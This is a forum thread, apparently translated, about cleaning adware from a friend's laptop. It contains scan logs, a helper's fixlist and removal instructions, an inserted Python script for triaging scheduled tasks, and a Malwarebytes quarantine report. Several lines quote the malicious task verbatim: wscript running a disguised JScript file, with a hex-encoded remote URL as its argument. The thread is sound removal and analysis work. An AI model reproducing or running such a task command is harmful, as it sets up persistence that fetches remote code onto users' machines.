Slow and probably infected laptop

  • RJ
  • SuperModerator
  • Super-moderator of the military forums
  • Gavrilo Milentijević
  • Commander of the Gornje Polje police station
  • Joined: 12 Feb 2005
  • Posts: 7544
  • Location: the Oval Office

This isn't my laptop but a friend's. It is extremely slow, barely opens the browser (Google flags it as a dangerous site), and every program that gets downloaded is also characterized as potentially infected.
I cleaned it with Glary Utilities (there was over 5 GB of junk); the computer has no AV program at all, and Malwarebytes found some nonsense, but even after the cleanup it behaves the same.
Here is the report

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 23.08.2018
Ran by +++++++(administrator) on MIRA-PC (10-06-2018 21:23:50)
Running from C:\Users\Mira++++++\Desktop
Loaded Profiles: Mira+++++++ (Available Profiles: Mira ++++++)
Platform: Windows 10 Enterprise 10240.17071 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: FF)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-t.....scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Microsoft Corporation) C:\Program Files (x86)\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\NisSrv.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MpCmdRun.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Skype Technologies S.A.) C:\Program Files (x86)\Skype\Phone\Skype.exe
(Glarysoft Ltd) C:\Program Files (x86)\Glary Utilities 5\Integrator.exe
(Microsoft Corporation) C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
(Microsoft Corporation) C:\Windows\System32\browser_broker.exe
(Microsoft Corporation) C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
(Microsoft Corporation) C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.10240.17020_none_1152834562020692\TiWorker.exe

==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [3944648 2015-09-14] (Synaptics Incorporated)
HKU\S-1-5-21-1623467669-1056203944-4258781565-1001\...\Run: [Skype] => C:\Program Files (x86)\Skype\Phone\Skype.exe [27226072 2016-11-15] (Skype Technologies S.A.)
HKU\S-1-5-21-1623467669-1056203944-4258781565-1001\...\Run: [GUDelayStartup] => C:\Program Files (x86)\Glary Utilities 5\StartupManager.exe [43984 2018-08-20] (Glarysoft Ltd)
HKU\S-1-5-21-1623467669-1056203944-4258781565-1001\...\RunOnce: [Uninstall C:\Users\Mira Karanović\AppData\Local\Microsoft\OneDrive\17.3.5951.0827] => C:\Windows\system32\cmd.exe /q /c rmdir /s /q "C:\Users\Mira Karanović\AppData\Local\Microsoft\OneDrive\17.3.5951.0827"
BootExecute: autocheck autochk *

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{95839d91-cfd6-48c8-91fc-5bf8eeffa38f}: [DhcpNameServer] 192.168.1.254
Tcpip\..\Interfaces\{d9ee17ee-5e39-48fc-8b6f-9a9068018bdc}: [DhcpNameServer] 192.168.1.1

Internet Explorer:
==================
HKU\S-1-5-21-1623467669-1056203944-4258781565-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://google.ba/

FireFox:
========
FF DefaultProfile: mbnbvglb.default-1528653924611
FF ProfilePath: C:\Users\Mira ++++++\AppData\Roaming\Mozilla\Firefox\Profiles\mbnbvglb.default-1528653924611 [2018-06-10]
FF Homepage: Mozilla\Firefox\Profiles\mbnbvglb.default-1528653924611 -> hxxp://www.google.ba/
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_30_0_0_154.dll [2018-06-10] ()
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_30_0_0_154.dll [2018-06-10] ()
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2018-08-02] (Adobe Systems Inc.)

Chrome:
=======
CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - hxxps://clients2.google.com/service/update2/crx

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 SynTPEnhService; C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [246472 2015-09-14] (Synaptics Incorporated)
R3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [362928 2015-07-10] (Microsoft Corporation)
R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [24856 2016-08-03] (Microsoft Corporation)

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S3 dg_ssudbus; C:\Windows\system32\DRIVERS\ssudbus.sys [131712 2017-06-11] (Samsung Electronics Co., Ltd.)
R1 GUBootStartup; C:\Windows\System32\drivers\GUBootStartup.sys [28936 2018-06-10] (Glarysoft Ltd)
R1 MpKsl291be7ab; C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{7F4960AB-3002-4D12-9098-BD45969A800C}\MpKsl291be7ab.sys [58120 2018-06-10] (Microsoft Corporation)
R3 smserial; C:\Windows\system32\DRIVERS\SmSerl64.sys [1227776 2015-07-10] (Motorola Inc.)
S3 UdeCx; C:\Windows\System32\drivers\udecx.sys [44032 2015-07-10] ()
S0 WdBoot; C:\Windows\System32\drivers\WdBoot.sys [44568 2015-07-10] (Microsoft Corporation)
R0 WdFilter; C:\Windows\System32\drivers\WdFilter.sys [291680 2015-07-10] (Microsoft Corporation)
R2 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [119648 2015-07-10] (Microsoft Corporation)
S3 wfpcapture; \SystemRoot\System32\drivers\wfpcapture.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2018-06-10 21:23 - 2018-06-10 21:25 - 000006042 _____ C:\Users\Mira Karanović\Desktop\FRST.txt
2018-06-10 21:23 - 2018-06-10 21:23 - 000000000 ____D C:\FRST
2018-06-10 21:19 - 2018-06-10 21:22 - 002413056 _____ (Farbar) C:\Users\Mira Karanović\Desktop\FRST64.exe
2018-06-10 21:13 - 2018-06-10 21:13 - 000016148 _____ C:\Windows\system32\MIRA-PC_Mira Karanović_HistoryPrediction.bin
2018-06-10 20:18 - 2018-06-10 20:20 - 000000000 ____D C:\AdwCleaner
2018-06-10 20:15 - 2018-06-10 20:17 - 007417040 _____ (Malwarebytes) C:\Users\Mira Karanović\Downloads\adwcleaner_7.2.2.exe
2018-06-10 20:05 - 2018-06-10 20:05 - 000000000 ____D C:\Users\Mira Karanović\Desktop\Old Firefox Data
2018-06-10 20:01 - 2018-06-10 20:01 - 000001220 _____ C:\Users\Public\Desktop\Firefox.lnk
2018-06-10 19:58 - 2018-06-10 19:59 - 000313768 _____ (Mozilla) C:\Users\Mira Karanović\Downloads\Firefox Installer.exe
2018-06-10 19:07 - 2018-08-20 03:44 - 000035792 _____ (Glarysoft Ltd) C:\Windows\system32\RegBootDefrag.exe
2018-06-10 18:26 - 2018-06-10 18:26 - 000001153 _____ C:\Users\Public\Desktop\Glary Utilities 5.lnk
2018-06-10 18:25 - 2018-06-10 18:26 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Glary Utilities 5
2018-06-10 18:25 - 2018-06-10 18:25 - 000028936 _____ (Glarysoft Ltd) C:\Windows\system32\Drivers\GUBootStartup.sys
2018-06-10 18:25 - 2018-06-10 18:25 - 000003290 _____ C:\Windows\System32\Tasks\GlaryInitialize 5
2018-06-10 18:25 - 2018-06-10 18:25 - 000001165 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Glary Utilities 5.lnk
2018-06-10 18:25 - 2018-06-10 18:25 - 000000000 ____D C:\Users\Mira Karanović\AppData\Roaming\GlarySoft
2018-06-10 18:25 - 2018-06-10 18:25 - 000000000 ____D C:\Users\Mira Karanović\AppData\Roaming\DiskDefrag
2018-06-10 18:25 - 2018-06-10 18:25 - 000000000 ____D C:\Program Files (x86)\Glary Utilities 5
2018-06-10 17:57 - 2018-06-10 17:57 - 021360640 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerInstaller.exe
2018-06-10 17:54 - 2018-06-10 17:58 - 017229968 _____ (Glarysoft Ltd) C:\Users\Mira Karanović\Downloads\gu5setup.exe

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2018-06-10 21:14 - 2015-09-14 11:07 - 000000000 ____D C:\Users\Mira Karanović\AppData\Roaming\Skype
2018-06-10 21:13 - 2018-04-27 21:13 - 000000600 _____ C:\Windows\Tasks\Chromium dacir.job
2018-06-10 21:13 - 2018-04-27 21:13 - 000000382 _____ C:\Windows\Tasks\{0CA4F43F-DE52-C713-44B9-735A7C8D7ADA}.job
2018-06-10 20:35 - 2016-11-18 18:41 - 000000000 ____D C:\Users\Mira Karanović\AppData\LocalLow\Mozilla
2018-06-10 20:21 - 2015-09-14 10:47 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2018-06-10 20:21 - 2015-07-10 14:21 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2018-06-10 20:21 - 2015-07-10 11:05 - 000262144 ___SH C:\Windows\system32\config\BBI
2018-06-10 20:01 - 2016-11-17 17:55 - 000000000 ____D C:\Program Files (x86)\Mozilla Firefox
2018-06-10 20:01 - 2015-09-14 10:47 - 000001232 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk
2018-06-10 20:01 - 2015-09-14 10:47 - 000000000 ____D C:\Users\Mira Karanović\AppData\Roaming\Mozilla
2018-06-10 19:55 - 2018-01-27 02:26 - 000000000 ____D C:\Windows10Upgrade
2018-06-10 19:30 - 2015-07-10 13:04 - 000000000 ___HD C:\Program Files\WindowsApps
2018-06-10 19:30 - 2015-07-10 13:04 - 000000000 ____D C:\Windows\AppReadiness
2018-06-10 19:15 - 2015-09-09 15:51 - 000000000 ____D C:\Users\Mira Karanović
2018-06-10 19:15 - 2015-07-10 11:05 - 086507520 _____ C:\Windows\system32\config\SOFTWARE.gu.bak
2018-06-10 19:15 - 2015-07-10 11:05 - 010223616 _____ C:\Windows\system32\config\SYSTEM.gu.bak
2018-06-10 19:15 - 2015-07-10 11:05 - 000032768 _____ C:\Windows\system32\config\SECURITY.gu.bak
2018-06-10 19:14 - 2015-07-10 12:55 - 000000000 ____D C:\Windows\CbsTemp
2018-06-10 19:14 - 2015-07-10 11:05 - 000524288 _____ C:\Windows\system32\config\DEFAULT.gu.bak
2018-06-10 18:24 - 2015-09-14 09:52 - 000004562 _____ C:\Windows\System32\Tasks\Adobe Acrobat Update Task
2018-06-10 18:21 - 2015-09-14 09:51 - 000002457 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2018-06-10 18:08 - 2015-09-09 15:57 - 000830266 _____ C:\Windows\system32\PerfStringBackup.INI
2018-06-10 18:08 - 2015-07-10 13:02 - 000000000 ____D C:\Windows\INF
2018-06-10 17:57 - 2018-04-27 21:10 - 000004590 _____ C:\Windows\System32\Tasks\Adobe Flash Player NPAPI Notifier
2018-06-10 17:57 - 2015-07-10 13:04 - 000000000 ____D C:\Windows\SysWOW64\Macromed
2018-06-10 17:57 - 2015-07-10 13:04 - 000000000 ____D C:\Windows\system32\Macromed
2018-06-10 16:19 - 2015-10-14 19:03 - 000004170 _____ C:\Windows\System32\Tasks\User_Feed_Synchronization-{7E69BD41-2FAA-4258-A8E4-2FB2496F8AD2}
2018-06-10 16:13 - 2018-04-27 21:13 - 000000000 ____D C:\ProgramData\{7B1BBE78-F159-34BE-779F-AAFCEDDD2132}
2018-05-12 22:42 - 2017-11-11 21:19 - 000003380 _____ C:\Windows\System32\Tasks\OneDrive Standalone Update Task-S-1-5-21-1623467669-1056203944-4258781565-1001
2018-05-12 22:41 - 2016-08-18 04:33 - 000002556 _____ C:\Users\Mira Karanović\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2018-05-12 22:41 - 2015-09-09 15:59 - 000000000 ___RD C:\Users\Mira Karanović\OneDrive

Files to move or delete:
====================
C:\Windows\Tasks\{0CA4F43F-DE52-C713-44B9-735A7C8D7ADA}.job


Some files in TEMP:
====================
2018-06-10 19:55 - 2018-06-10 19:55 - 006612768 _____ (Microsoft Corporation) C:\Users\Mira ++++++\AppData\Local\Temp\Windows10Upgrade.exe

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2018-06-10 19:32

==================== End of FRST.txt ============================


  • Joined: 26 Aug 2010
  • Posts: 10455
  • Location: Hypnos Control Room, Tokyo Metropolitan Government Building

Open Notepad and copy the following text, which is inside the Code box.

C:\Windows\Tasks\{0CA4F43F-DE52-C713-44B9-735A7C8D7ADA}.job
Task: {7A7325E2-31C1-49B3-B359-67FC292D11CA} - System32\Tasks\Chromium dacir => C:\Windows\system32\wscript.exe "C:\ProgramData\{7B1BBE78-F159-34BE-779F-AAFCEDDD2132}\lasa.txt" "68747470733a2f2f64326234366537617832617466692e636c6f756466726f6e742e6e6574" "//B" "//E:jscript" "--IsErIk" <==== ATTENTION
Task: C:\Windows\Tasks\Chromium dacir.job => C:\Windows\system32\wscript.ex C:\ProgramData\{7B1BBE78-F159-34BE-779F-AAFCEDDD2132}\lasa.txt <==== ATTENTION
Task: C:\Windows\Tasks\{0CA4F43F-DE52-C713-44B9-735A7C8D7ADA}.job => C:\Users\Mira Karanovic\AppData\Roaming\0CA4F43F-DE52-C713-44B9-735A7C8D7ADA\SyncTask.exe <==== ATTENTION
VirusTotal: C:\Windows\system32\wscript.ex;C:\Users\Mira Karanovic\AppData\Roaming\0CA4F43F-DE52-C713-44B9-735A7C8D7ADA\SyncTask.exe
C:\ProgramData\{7B1BBE78-F159-34BE-779F-AAFCEDDD2132}\lasa.txt
C:\Users\Mira Karanovic\AppData\Roaming\0CA4F43F-DE52-C713-44B9-735A7C8D7ADA\SyncTask.exe
EmptyTemp:


In Notepad click File --> Save As
Under Encoding choose UTF-8.
Name the file Fixlist and save it to the Desktop
Double-click FRST.exe to run it again
Click Fix and wait for the program to finish.
If the program asks to restart the computer, let it do so undisturbed.
When it finishes, fixlog.txt will open; copy its contents into the thread.
A copy (fixlog.txt) will also be on the Desktop.
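
The three "Task:" lines the helper put into the fixlist above share the traits that make a scheduled task worth removing: a script host (wscript.exe) running a file with a .txt extension, the engine forced with //E:jscript, a long hex-encoded argument, and payloads under ProgramData and AppData in bare-GUID-named folders. The script below is an added example, not code from the thread, from FRST or from Farbar: it triages FRST "Task:" lines by those rules, decodes the hex argument, and writes a fixlist in the same shape the helper used (the Task: line pasted back verbatim, the payload files, then EmptyTemp:), saved as UTF-8 as the instructions require. The three flagged lines are copied from the post; the fourth, benign Adobe line and all thresholds are constructed for the example. The one check it adds that the manual procedure relies on but never states: only files in user-writable locations go into the fixlist, so a system binary such as wscript.exe can never end up being deleted.

```python
# Added example: triage FRST "Task:" lines and build a fixlist from the bad ones.
# Not code from the thread, FRST or Farbar; detection rules are this example's own.
import re
from pathlib import Path

# Constructed sample input: the three lines FRST marked "<==== ATTENTION" in the
# post above, plus one made-up benign vendor task for contrast.
FRST_TASK_LINES = [
    r'Task: {7A7325E2-31C1-49B3-B359-67FC292D11CA} - System32\Tasks\Chromium dacir => '
    r'C:\Windows\system32\wscript.exe "C:\ProgramData\{7B1BBE78-F159-34BE-779F-AAFCEDDD2132}\lasa.txt" '
    r'"68747470733a2f2f64326234366537617832617466692e636c6f756466726f6e742e6e6574" "//B" "//E:jscript" "--IsErIk" <==== ATTENTION',
    r'Task: C:\Windows\Tasks\Chromium dacir.job => C:\Windows\system32\wscript.ex '
    r'C:\ProgramData\{7B1BBE78-F159-34BE-779F-AAFCEDDD2132}\lasa.txt <==== ATTENTION',
    r'Task: C:\Windows\Tasks\{0CA4F43F-DE52-C713-44B9-735A7C8D7ADA}.job => '
    r'C:\Users\Mira Karanovic\AppData\Roaming\0CA4F43F-DE52-C713-44B9-735A7C8D7ADA\SyncTask.exe <==== ATTENTION',
    r'Task: {11111111-2222-3333-4444-555555555555} - System32\Tasks\Adobe Acrobat Update Task => '
    r'C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe',   # constructed, benign
]

SCRIPT_HOSTS = ("wscript.ex", "cscript.ex", "mshta.exe")   # "wscript.ex" also hits the truncated form FRST printed
SCRIPT_EXTS = (".js", ".jse", ".vbs", ".vbe", ".wsf", ".hta")
USER_WRITABLE = ("\\programdata\\", "\\appdata\\", "\\users\\public\\", "\\temp\\")

# A Windows path ending in an interesting extension. The negative lookahead stops one
# path from swallowing the next when FRST prints them unquoted, separated by a space
# ("...\wscript.ex C:\ProgramData\...\lasa.txt").
PATH_RE = re.compile(
    r'[A-Za-z]:\\(?:(?![A-Za-z]:\\)[^"<])*?\.(?:exe|dll|txt|js|jse|vbs|vbe|wsf|hta|bat|cmd|ps1)\b',
    re.IGNORECASE)
HEX_RE = re.compile(r"\b[0-9a-fA-F]{16,}\b")      # long bare hex run used as an "encoded" argument
GUID_DIR_RE = re.compile(r"[\\{][0-9A-Fa-f]{8}-(?:[0-9A-Fa-f]{4}-){3}[0-9A-Fa-f]{12}")


def decode_hex_args(cmd):
    """Every long hex token in cmd that decodes to printable ASCII."""
    out = []
    for tok in HEX_RE.findall(cmd):
        if len(tok) % 2:
            continue
        try:
            text = bytes.fromhex(tok).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            continue
        if text.isprintable():
            out.append(text)
    return out


def classify_task(line):
    """Parse one FRST 'Task:' line; 'reasons' stays empty when nothing looks off."""
    if not line.startswith("Task: ") or " => " not in line:
        return None
    left, right = line.split(" => ", 1)
    name = left[len("Task: "):]
    cmd = right.replace("<==== ATTENTION", "").strip()
    low = cmd.lower()
    paths = PATH_RE.findall(cmd)
    decoded = decode_hex_args(cmd)
    reasons = []
    if any(h in low for h in SCRIPT_HOSTS):
        targets = [p for p in paths if not any(h in p.lower() for h in SCRIPT_HOSTS)]
        odd = [p for p in targets if not p.lower().endswith(SCRIPT_EXTS)]
        if odd:
            reasons.append("script host runs a file without a script extension: " + ", ".join(odd))
        if "//e:" in low:
            reasons.append("script engine forced with //E: instead of chosen by extension")
    payloads = [p for p in paths if any(d in p.lower() for d in USER_WRITABLE)]
    if payloads:
        reasons.append("executable content in a user-writable location: " + ", ".join(payloads))
    if decoded:
        reasons.append("hex-encoded argument decodes to: " + ", ".join(decoded))
    if GUID_DIR_RE.search(cmd):
        reasons.append("payload stored under a bare-GUID-named folder")
    return {"name": name, "command": cmd, "paths": paths,
            "payload_paths": payloads, "decoded": decoded, "reasons": reasons}


def build_fixlist(lines):
    """Fixlist text: each bad Task line verbatim (FRST deletes the task), the payload
    files in user-writable places, then EmptyTemp:. System binaries are never listed."""
    entries = []
    for line in lines:
        task = classify_task(line)
        if task and task["reasons"]:
            entries.append(line)
            entries.extend(p for p in task["payload_paths"] if p not in entries)
    if not entries:
        return ""
    entries.append("EmptyTemp:")
    return "\n".join(entries) + "\n"


def write_fixlist(text, path="fixlist.txt"):
    """Save with the UTF-8 encoding the instructions ask for; returns the Path."""
    target = Path(path)
    target.write_text(text, encoding="utf-8")
    return target


if __name__ == "__main__":
    for task in map(classify_task, FRST_TASK_LINES):
        print(("SUSPICIOUS  " if task["reasons"] else "ok          ") + task["name"])
        for reason in task["reasons"]:
            print("    - " + reason)
    print("\n--- fixlist.txt ---")
    print(build_fixlist(FRST_TASK_LINES), end="")
```

Run it as-is and it prints the verdict per task and the fixlist text; call write_fixlist(build_fixlist(lines), r"C:\Users\<you>\Desktop\fixlist.txt") to produce the file the Fix step reads. Reviewing the generated fixlist by eye before running Fix is still part of the procedure; the path filter only prevents the obvious mistake.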

  • RJ
  • SuperModerator
  • Super-moderator of the military forums
  • Gavrilo Milentijević
  • Commander of the Gornje Polje police station
  • Joined: 12 Feb 2005
  • Posts: 7544
  • Location: the Oval Office

I did as you described. Let me note right away that the whole process took far too long, over 5 minutes, and after the restart the computer is still terribly slow.
Here is the report

by Mira Karanović (28-08-2018 13:12:25) Run:1
Running from C:\Users\Mira Karanović\Desktop
Loaded Profiles: Mira Karanović & (Available Profiles: Mira Karanović)
Boot Mode: Normal
==============================================

fixlist content:
*****************
C:\Windows\Tasks\{0CA4F43F-DE52-C713-44B9-735A7C8D7ADA}.job
Task: {7A7325E2-31C1-49B3-B359-67FC292D11CA} - System32\Tasks\Chromium dacir => C:\Windows\system32\wscript.exe "C:\ProgramData\{7B1BBE78-F159-34BE-779F-AAFCEDDD2132}\lasa.txt" "68747470733a2f2f64326234366537617832617466692e636c6f756466726f6e742e6e6574" "//B" "//E:jscript" "--IsErIk" <==== ATTENTION
Task: C:\Windows\Tasks\Chromium dacir.job => C:\Windows\system32\wscript.ex C:\ProgramData\{7B1BBE78-F159-34BE-779F-AAFCEDDD2132}\lasa.txt <==== ATTENTION
Task: C:\Windows\Tasks\{0CA4F43F-DE52-C713-44B9-735A7C8D7ADA}.job => C:\Users\Mira Karanovic\AppData\Roaming\0CA4F43F-DE52-C713-44B9-735A7C8D7ADA\SyncTask.exe <==== ATTENTION
VirusTotal: C:\Windows\system32\wscript.ex;C:\Users\Mira Karanovic\AppData\Roaming\0CA4F43F-DE52-C713-44B9-735A7C8D7ADA\SyncTask.exe
C:\ProgramData\{7B1BBE78-F159-34BE-779F-AAFCEDDD2132}\lasa.txt
C:\Users\Mira Karanovic\AppData\Roaming\0CA4F43F-DE52-C713-44B9-735A7C8D7ADA\SyncTask.exe
EmptyTemp:
*****************

C:\Windows\Tasks\{0CA4F43F-DE52-C713-44B9-735A7C8D7ADA}.job => moved successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{7A7325E2-31C1-49B3-B359-67FC292D11CA} => not found
"C:\Windows\System32\Tasks\Chromium dacir" => not found
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Chromium dacir => not found
"C:\Windows\Tasks\Chromium dacir.job" => not found
"C:\Windows\Tasks\{0CA4F43F-DE52-C713-44B9-735A7C8D7ADA}.job" => not found
"VirusTotal: C:\Windows\system32\wscript.ex" => not found
"VirusTotal: C:\Users\Mira Karanovic\AppData\Roaming\0CA4F43F-DE52-C713-44B9-735A7C8D7ADA\SyncTask.exe" => not found
"C:\ProgramData\{7B1BBE78-F159-34BE-779F-AAFCEDDD2132}\lasa.txt" => not found
"C:\Users\Mira Karanovic\AppData\Roaming\0CA4F43F-DE52-C713-44B9-735A7C8D7ADA\SyncTask.exe" => not found

=========== EmptyTemp: ==========

BITS transfer queue => 294335 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 9487757 B
Java, Flash, Steam htmlcache => 10596 B
Windows/system/drivers => 167847014 B
Edge => 2653483 B
Chrome => 0 B
Firefox => 51702163 B
Opera => 0 B

  • Joined: 26 Aug 2010
  • Posts: 10455
  • Location: Hypnos Control Room, Tokyo Metropolitan Government Building

Download Malwarebytes Anti-Malware from this, this or this link and install the application.
Run mb3-setup-consumer-{version}.exe and follow the installation instructions. After installation, click Finish

On first launch the program shows a "welcome" window. Feel free to close it.
Note: the Premium features are already activated and last 13 days from the moment of installation. You can turn the Premium features off under Settings > My Account.

• Scanner settings: in Settings, click the Protection tab. Under the Scan Options section, enable the "Scan for rootkits" option.
• Prepare a Threat Scan: in Dashboard, click the Scan Now button. MBAM will update its database and start the scan.

When the scan finishes, if an infection was detected, make sure everything is selected and click Remove Selected. Restart the computer if the program asks for a restart.
• Deliver the log: under Reports pick the Scan Report with today's date and click View Report.

Export the log to the Desktop:
- Click the Export button at the bottom, then choose 'Text file (*.txt)'
- In the Save File dialog that appears, click Desktop. In the File name: field type "mbam" (without quotes) and click Save.
- The message "Your file has been successfully exported" appears; click Ok and close the window.

• In your reply attach the mbam.txt log using the "Attach file" option.

  • RJ
  • SuperModerator
  • Super-moderator of the military forums
  • Gavrilo Milentijević
  • Commander of the Gornje Polje police station
  • Joined: 12 Feb 2005
  • Posts: 7544
  • Location: the Oval Office

I installed Mbam just this morning from the first link offered and ran a scan (without this "scan for rootkits"), and there were some threats; here is the report from quarantine.
A little while ago I ran the scan per your instructions; nothing was found.

  • RJ
  • SuperModerator
  • Super-moderator of the military forums
  • Gavrilo Milentijević
  • Commander of the Gornje Polje police station
  • Joined: 12 Feb 2005
  • Posts: 7544
  • Location: the Oval Office

PUM: Detect

-Scan Details-
Process: 0
(No malicious items detected)

Module: 0
(No malicious items detected)

Registry Key: 6
PUP.Optional.WinYahoo.TskLnk, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\Chromium dacir, Quarantined, [3728], [453921],1.0.6535
PUP.Optional.WinYahoo.TskLnk, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{7A7325E2-31C1-49B3-B359-67FC292D11CA}, Quarantined, [3728], [453921],1.0.6535
PUP.Optional.WinYahoo.TskLnk, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\PLAIN\{7A7325E2-31C1-49B3-B359-67FC292D11CA}, Quarantined, [3728], [453921],1.0.6535
PUP.Optional.WinYahoo.TskLnk, HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Chromium dacir, Quarantined, [3728], [-1],0.0.0
PUP.Optional.WinYahoo.TskLnk, HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{7A7325E2-31C1-49B3-B359-67FC292D11CA}, Quarantined, [3728], [-1],0.0.0
PUP.Optional.WinYahoo.TskLnk, HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{7A7325E2-31C1-49B3-B359-67FC292D11CA}, Quarantined, [3728], [-1],0.0.0

Registry Value: 1
PUP.Optional.WinYahoo.Generic, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{7A7325E2-31C1-49B3-B359-67FC292D11CA}|PATH, Quarantined, [3756], [483378],1.0.6535

Registry Data: 0
(No malicious items detected)

Data Stream: 0
(No malicious items detected)

Folder: 1
PUP.Optional.WinYahoo.TskLnk, C:\PROGRAMDATA\{7B1BBE78-F159-34BE-779F-AAFCEDDD2132}, Quarantined, [3728], [453921],1.0.6535

File: 17
PUP.Optional.WinYahoo.TskLnk, C:\WINDOWS\TASKS\Chromium dacir.job, Quarantined, [3728], [453921],1.0.6535
PUP.Optional.WinYahoo.TskLnk, C:\WINDOWS\SYSTEM32\TASKS\Chromium dacir, Quarantined, [3728], [453921],1.0.6535
PUP.Optional.WinYahoo.TskLnk, C:\PROGRAMDATA\{7B1BBE78-F159-34BE-779F-AAFCEDDD2132}\lasa.txt, Quarantined, [3728], [453921],1.0.6535
PUP.Optional.WinYahoo.TskLnk, C:\ProgramData\{7B1BBE78-F159-34BE-779F-AAFCEDDD2132}\aowLC, Quarantined, [3728], [453921],1.0.6535
PUP.Optional.WinYahoo.TskLnk, C:\ProgramData\{7B1BBE78-F159-34BE-779F-AAFCEDDD2132}\hdat1, Quarantined, [3728], [453921],1.0.6535
PUP.Optional.WinYahoo.TskLnk, C:\ProgramData\{7B1BBE78-F159-34BE-779F-AAFCEDDD2132}\hdat2, Quarantined, [3728], [453921],1.0.6535
PUP.Optional.WinYahoo.TskLnk, C:\ProgramData\{7B1BBE78-F159-34BE-779F-AAFCEDDD2132}\yjUzk, Quarantined, [3728], [453921],1.0.6535
PUP.Optional.WinYahoo.TskLnk, C:\WINDOWS\SYSTEM32\TASKS\Chromium dacir, Quarantined, [3728], [-1],0.0.0
